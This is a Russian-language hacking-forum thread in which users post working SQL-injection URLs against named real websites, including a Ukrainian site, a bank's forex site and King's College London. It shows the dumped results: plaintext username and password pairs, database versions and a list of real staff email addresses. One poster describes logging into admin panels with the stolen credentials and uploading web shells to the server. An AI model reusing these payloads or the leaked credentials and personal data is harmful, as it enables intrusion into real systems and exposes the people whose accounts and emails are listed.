ANTICHAT — форум по информационной безопасности, OSINT и технологиям

google://information_schema
И вперед...

И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут

PR5
http://www.uwsn.org/sup.php?id=-99999+union+select+1,2,3,4,unhex(hex(version())),6/*

version:4.1.13-standard-log

Спасибо m0rgan !!

newtid@localhost
5.0.32-Debian_7etch8-log

http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+ limit+1,1%20--

admin:shokhov
price:123456
isisis:123456
vale:valevale
irina:123
towka:123456
boris:123
margarita:123456
kuzoff:54214

админку так и не нашел!

Акционерный коммерческий банк «Интеграл» (сокращенно АКБ «Интеграл-банк») – это универсальное банковское учреждение, предоставляющее полный комплекс услуг на внутреннем и внешнем финансовых рынках.
url: http://fxintegral.com/
target: http://fxintegral.com/beginer/ справа email подписка RSS
using: в имени вводим -999999' email: любой
Description: 4 поля. Вывод не приходит на email. Запрос -999' не обрабатывается, при нажатии отправить выводит SQL Syntax и.т.д. Запрос union+select+user(),user(),user(),user()/* проходит успешно. Вывод запроса опять же не приходит на email. Не показывается на странице.На сайте доступны различные банковские операции.

а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
всю базу можно раскрутить а сделать ничего более.
file_priv закрыт, ни шэлл, ни другие пакости не проходят

Эээ... Уважаемый , а что вы вообще хотите ??? Как то давно я поднимал тему на irc по поводу целесообразности и вообще надобности взломов
Мало кто мог адекватно ответить для чего он ломает тот или иной ресурс. Сегодня за ночь пересмотрел почти всю эту ветку и тут помоему просто все учатся.
Человеку показали как сделать определенное движение) Он его сделал и сказал спасибо! Я считаю это резальт который нужен.

Спустя 20 мин)

Уважаемый, Хакер это не тот человек который знает скул и как ее крутит, хакер этот тот кто думает головой. Перед тем как или во время поиска скули надо обращать внимание на все... надо собирать информацию об атакуемом сервере и понимать в конечном итоге что тебе надо от него , если только БД , то наш уважаемый -DREASTY- , толко что показал что данные очень элементарно экспортируются из БД администратора в наш Notepad++ это уже в своем роде пакость (а для кого то возможно и деньги), так что на ваш вопрос по поводу того "а толку то?" лично я ответил.
Идем далее, с чего вы делаете такие поспешные выводы относителньо того что дальше ничего не сделать? Подколоть старательного ученика в том что он плохо научился пользоваться MySQL 5.+? Или это просто ваши выводы из ходя из того что Вы ничего не смогли сделать???
Итак(после быстрого моего анализа):
_http://www.tid.odessa.ua/phpinfo.php
_http://www.tid.odessa.ua/adserv/www/admin/
(пароль и логин подходят)
это чисто управление пользователями,кликами,бан нерами,БД,ПО,обновлением ддвига... после 10 минутнорго мучения заливки шелла через баннер shell.php.gif при том что там менял настройки хранения банера не в БД и не стороннем сервере а именно в каталоге сайта ... прав на исполнение все равно не было... поэтому шелл как был залит так и удален. болше ничего пробовать не сстал, поскольку понимал что где должно быть управление контентом сайта...
Так оно и есть _http://www.tid.odessa.ua/siteadmin/
(логин пароль опять же подходят)
там сразу есть заливка файлов прям первая первая страничка ... тыдынс _http://www.tid.odessa.ua/files/achat.php , поскольку не люблю функционал этого шелла сразу через еще и другой шелл. Более того права на сервере не велики , но на чтение практически все. более того можем вылезти из корней директории выше на другие сайты ... 2ip показал что их 3 , но в реале их там больше!

Вывод: Уважаемый не делайте поспешных выводов!!!

Прошу простить Администрацию и Модератора за типа оффтоп... ну просто правда выбесил пассажир =((

_http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,email ,15,16,17,18,19,20,21,22,23,24,25+from+users--&year=2008

4.1.22-standard-log::webteam_newsdev::newsdev@localhost

Next:
waqar.alam@kcl.ac.uk
christopher.saward@kcl.ac.uk
julie.munk@kcl.ac.uk
susan.farrell@kcl.ac.uk
peter.graham@kcl.ac.uk
alex.bevis@kcl.ac.uk
kate.moore@kcl.ac.uk
kate.saunders@kcl.ac.uk
liz.newell@kcl.ac.uk
melanie.gardner@kcl.ac.uk
webnews@kcl.ac.uk
kate.thomas@kcl.ac.uk

префиксов нет ни перед таблицами ни в колонках.

поэтому твоя фраза "к сожелению мало чем помогло)", черезчур поспешна ... кто ищет тот всегда найдет ...